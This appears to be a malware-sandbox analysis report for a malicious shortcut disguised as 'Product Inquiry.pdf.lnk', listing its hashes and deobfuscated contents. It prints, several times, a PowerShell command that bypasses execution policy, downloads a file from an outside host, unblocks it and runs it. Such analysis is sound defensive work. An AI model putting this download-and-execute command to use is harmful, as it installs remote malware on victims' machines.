|
Hash | Hash Value |
|---|---|
| MD5 | 6d759cc730c3d9308a9971373bb70cbe
|
| Sha1 | 1fc3a2cefc0f6fd2766f3652556d07b893938043
|
| Sha256 | f06e6519db9c9a3cbdf3d512e2fc40cd68081c4bc199f0f8843bd59d0df13de6
|
| Sha384 | fc5a555c68d1a5b33cb30e41f7e7bd663a03e2d4ca52a3428f288adb7c85c5bfd9c33a4397a543a7523a5386bc353d85
|
| Sha512 | 823e97a964bbb6d47b7b4eaf02ffb84d141512e0f6575f0e5fe9420769391bfdef9f19d82c673fda12f6a5a5b2c6d5db9025f8c12f6c7b6eba732013ae1929c8
|
| SSDeep | 12:5j+RzL3q/BJ5FNg7SeIPsr9hxALOdSUJf9vX8HhgSbzFSHkvtnbckd+ozMJaH:9qzL3KBJ/N6SHsh3GS9vXghgi5IkVnbL
|
| TLSH | 9D0183F2C0CC4E9CD5128DB26983AFD8941000810C1618AB9701B10EAEEBFD8E7A21B2
|
|
Name0 | Value |
|---|---|
| LNK: Command Execution | cmd.exe /c powershell -NoP -NonI -EP Bypass -c "$u='https://sdlxmetal.com/soa/microsofts.com';$f='microsofts.com';$p=Join-Path $env:PUBLIC $f;iwr $u -OutF $p;Unblock-File $p; start $p" |
| Deobfuscated PowerShell | "$u='https://sdlxmetal.com/soa/microsofts.com';$f='microsofts.com';$p=Join-Path $env:PUBLIC $f;iwr $u -OutF $p;Unblock-File $p; start $p" iconlocation: "%ProgramFiles" (x86) "%\Microsoft\Edge\Application\msedge.exe" extradata: knownfolderdatablock: headerblocksize: 28 28 blocksignature: -1610612725 displayname: "System32" knownfolderid: "1ac14e77-02e7-4e5d-b744-2eb1ae5198b7" offset: 221 221 propertystoredatablock: headerblocksize: 149 149 blocksignature: -1610612727 serializedpropertystorage: storagesize: 137 137 version: 1397773105 formatid: "46588ae2-4cbc-4338-bbfc-139326986dce" integername: valuesize: 109 109 id: 4 typedpropertyvalue: type: "VT_LPWSTR" value: "S-1-5-21-4159481102-289033905-184376019-1001" specialfolderdatablock: headerblocksize: 16 16 blocksignature: -1610612731 specialfolderid: "CSIDL_SYSTEM" offset: 221 221 |
| Deobfuscated PowerShell | $u = "https://sdlxmetal.com/soa/microsofts.com" $f = "microsofts.com" $p = Join-Path $env:PUBLIC $f Invoke-WebRequest $u -OutF $p Unblock-File $p start $p |
|
Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | cmd.exe /c powershell -NoP -NonI -EP Bypass -c "$u='https://sdlxmetal.com/soa/microsofts.com';$f='microsofts.com';$p=Join-Path $env:PUBLIC $f;iwr $u -OutF $p;Unblock-File $p; start $p" Malicious |
6d759cc730c3d9308a9971373bb70cbe > Product Inquiry.pdf.lnk |
| Deobfuscated PowerShell | "$u='https://sdlxmetal.com/soa/microsofts.com';$f='microsofts.com';$p=Join-Path $env:PUBLIC $f;iwr $u -OutF $p;Unblock-File $p; start $p" iconlocation: "%ProgramFiles" (x86) "%\Microsoft\Edge\Application\msedge.exe" extradata: knownfolderdatablock: headerblocksize: 28 28 blocksignature: -1610612725 displayname: "System32" knownfolderid: "1ac14e77-02e7-4e5d-b744-2eb1ae5198b7" offset: 221 221 propertystoredatablock: headerblocksize: 149 149 blocksignature: -1610612727 serializedpropertystorage: storagesize: 137 137 version: 1397773105 formatid: "46588ae2-4cbc-4338-bbfc-139326986dce" integername: valuesize: 109 109 id: 4 typedpropertyvalue: type: "VT_LPWSTR" value: "S-1-5-21-4159481102-289033905-184376019-1001" specialfolderdatablock: headerblocksize: 16 16 blocksignature: -1610612731 specialfolderid: "CSIDL_SYSTEM" offset: 221 221 Malicious |
6d759cc730c3d9308a9971373bb70cbe > Product Inquiry.pdf.lnk > [Lnk Summary] > [PowerShell Command] |
| Deobfuscated PowerShell | $u = "https://sdlxmetal.com/soa/microsofts.com" $f = "microsofts.com" $p = Join-Path $env:PUBLIC $f Invoke-WebRequest $u -OutF $p Unblock-File $p start $p Malicious |
6d759cc730c3d9308a9971373bb70cbe > Product Inquiry.pdf.lnk > LNK CommandLine > [PowerShell Command] |